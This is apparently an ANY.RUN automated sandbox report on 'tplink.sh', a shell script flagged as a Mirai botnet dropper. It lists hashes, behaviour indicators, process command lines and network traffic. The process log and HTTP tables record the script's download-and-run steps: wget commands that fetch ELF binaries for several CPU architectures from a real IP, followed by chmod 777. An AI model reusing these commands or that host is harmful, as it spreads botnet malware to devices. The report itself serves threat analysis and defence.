Malware analysis tplink.sh Malicious activity | ANY.RUN

Add for printing

File name:	tplink.sh
Full analysis:	https://app.any.run/tasks/562ac2f4-a674-412b-bda0-25116749a668
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	July 14, 2025, 15:51:31
OS:	Ubuntu 22.04.2
Tags:	auto mirai botnet
Indicators:
MIME:	text/plain
File info:	ASCII text
MD5:	7697F8E63B470044B580EDF1C2020E34
SHA1:	837A151FE5B53DFF354985A3572DFB662B9C99D9
SHA256:	E26444C37E7A639192A99967A779B3C65C22EFCE5A4B115BB8041A38A6E90894
SSDEEP:	12:wus6ulXuJfKU7zwKDCEoXYNIl5WkyGjB0LK7aXUlW:wusF5uJfp3VerYNI7Wk9YK2XUA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been found (auto)
  - wget (PID: 41413)
  - wget (PID: 41419)
  - wget (PID: 41401)
  - wget (PID: 41407)
  - wget (PID: 41425)
  - wget (PID: 41431)
  - wget (PID: 41437)
- Application was dropped or rewritten from another process
  - x86 (PID: 41445)
  - x86 (PID: 41441)
  - x86 (PID: 41440)
  - x86 (PID: 41439)
  - x86 (PID: 41444)
  - x86 (PID: 41442)
  - x86 (PID: 41446)
  - x86 (PID: 41443)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 41394)
- Uses wget to download content
  - bash (PID: 41398)
- Executes the "rm" command to delete files or directories
  - bash (PID: 41398)
- Executes commands using command-line interpreter
  - sudo (PID: 41397)
  - bash (PID: 41398)
- Reads /proc/mounts (likely used to find writable filesystems)
  - x86 (PID: 41442)
- Potential Corporate Privacy Violation
  - wget (PID: 41401)
  - wget (PID: 41407)
  - wget (PID: 41425)
  - wget (PID: 41419)
  - wget (PID: 41437)
  - wget (PID: 41413)
  - wget (PID: 41431)
- Connects to unusual port
  - x86 (PID: 41446)
INFO
- Checks timezone
  - wget (PID: 41401)
  - wget (PID: 41407)
  - wget (PID: 41413)
  - wget (PID: 41419)
  - wget (PID: 41425)
  - wget (PID: 41437)
  - wget (PID: 41431)
- Creates file in the temporary folder
  - wget (PID: 41401)
  - wget (PID: 41407)
  - wget (PID: 41413)
  - wget (PID: 41419)
  - wget (PID: 41431)
  - wget (PID: 41437)
  - wget (PID: 41425)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

181

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

41393

/bin/sh -c "sudo chown user /tmp/tplink\.sh && chmod +x /tmp/tplink\.sh && DISPLAY=:0 sudo -iu user /tmp/tplink\.sh "

/usr/bin/dash

—

UbvyYXL4x2mYa65Q

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41394

sudo chown user /tmp/tplink.sh

/usr/bin/sudo

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11

41395

chown user /tmp/tplink.sh

/usr/bin/chown

—

sudo

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41396

chmod +x /tmp/tplink.sh

/usr/bin/chmod

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41397

sudo -iu user /tmp/tplink.sh

/usr/bin/sudo

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11

41398

-bash --login -c \/tmp\/tplink\.sh

/usr/bin/bash

—

sudo

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6

41399

/usr/bin/locale-check C.UTF-8

/usr/bin/locale-check

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41400

rm mips

/usr/bin/rm

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

256

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

41401

wget http://78.31.250.161/mips

/usr/bin/wget

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

41402

chmod 777 mips

/usr/bin/chmod

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
41401	wget	/tmp/mips (deleted)		o
		MD5:—	SHA256:—
41407	wget	/tmp/mpsl (deleted)		o
		MD5:—	SHA256:—
41413	wget	/tmp/arm4 (deleted)		o
		MD5:—	SHA256:—
41419	wget	/tmp/arm5 (deleted)		o
		MD5:—	SHA256:—
41425	wget	/tmp/arm6 (deleted)		o
		MD5:—	SHA256:—
41431	wget	/tmp/arm7 (deleted)		o
		MD5:—	SHA256:—
41437	wget	/tmp/x86 (deleted)		o
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.98:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
41401	wget	GET	200	78.31.250.161:80	http://78.31.250.161/mips	unknown	—	—	—
41407	wget	GET	200	78.31.250.161:80	http://78.31.250.161/mpsl	unknown	—	—	—
41413	wget	GET	200	78.31.250.161:80	http://78.31.250.161/arm4	unknown	—	—	—
41419	wget	GET	200	78.31.250.161:80	http://78.31.250.161/arm5	unknown	—	—	—
41425	wget	GET	200	78.31.250.161:80	http://78.31.250.161/arm6	unknown	—	—	—
41431	wget	GET	200	78.31.250.161:80	http://78.31.250.161/arm7	unknown	—	—	—
41437	wget	GET	200	78.31.250.161:80	http://78.31.250.161/x86	unknown	—	—	—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.48:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	91.189.91.98:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
1178	snap-store	169.150.255.181:443	odrs.gnome.org	—	GB	whitelisted
512	snapd	185.125.188.57:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
41401	wget	78.31.250.161:80	—	AS-WAVE-1	US	unknown
41407	wget	78.31.250.161:80	—	AS-WAVE-1	US	unknown
41413	wget	78.31.250.161:80	—	AS-WAVE-1	US	unknown
41419	wget	78.31.250.161:80	—	AS-WAVE-1	US	unknown

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	2620:2d:4000:1::22 2001:67c:1562::24 2620:2d:4000:1::96 2620:2d:4002:1::198 2620:2d:4002:1::197 2620:2d:4000:1::2b 2620:2d:4000:1::98 2620:2d:4000:1::23 2620:2d:4000:1::2a 2620:2d:4000:1::97 2001:67c:1562::23 2620:2d:4002:1::196 91.189.91.98 185.125.190.49 185.125.190.48 185.125.190.17 91.189.91.97 91.189.91.48 91.189.91.96 91.189.91.49 185.125.190.18 185.125.190.98 185.125.190.97 185.125.190.96	whitelisted
google.com	142.250.185.206 2a00:1450:4001:808::200e	whitelisted
odrs.gnome.org	169.150.255.181 169.150.255.183 212.102.56.178 195.181.175.40 195.181.170.19 37.19.194.80 207.211.211.27 2a02:6ea0:c700::21 2a02:6ea0:c700::11 2a02:6ea0:c700::112 2a02:6ea0:c700::107 2a02:6ea0:c700::19 2a02:6ea0:c700::18 2a02:6ea0:c700::101	whitelisted
api.snapcraft.io	185.125.188.57 185.125.188.58 185.125.188.59 185.125.188.54 2620:2d:4000:1010::344 2620:2d:4000:1010::117 2620:2d:4000:1010::42 2620:2d:4000:1010::2e6	whitelisted
alpine-node.libre	—	unknown
6.100.168.192.in-addr.arpa	—	unknown
pacific-node.libre	—	unknown

Threats

PID	Process	Class	Message
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
—	—	Potentially Bad Traffic	ET HUNTING Observed DNS Query for OpenNIC Alternative DNS TLD (.libre)
—	—	Potentially Bad Traffic	ET HUNTING Observed DNS Query for OpenNIC Alternative DNS TLD (.libre)
—	—	Potentially Bad Traffic	ET HUNTING Observed DNS Query for OpenNIC Alternative DNS TLD (.libre)

Add for printing

No debug info

General Info

tplink.sh

7697F8E63B470044B580EDF1C2020E34

837A151FE5B53DFF354985A3572DFB662B9C99D9

E26444C37E7A639192A99967A779B3C65C22EFCE5A4B115BB8041A38A6E90894

12:wus6ulXuJfKU7zwKDCEoXYNIl5WkyGjB0LK7aXUlW:wusF5uJfp3VerYNI7Wk9YK2XUA

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been found (auto)

Application was dropped or rewritten from another process

SUSPICIOUS

Modifies file or directory owner

Uses wget to download content

Executes the "rm" command to delete files or directories

Executes commands using command-line interpreter

Reads /proc/mounts (likely used to find writable filesystems)

Potential Corporate Privacy Violation

Connects to unusual port

INFO

Checks timezone

Creates file in the temporary folder

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings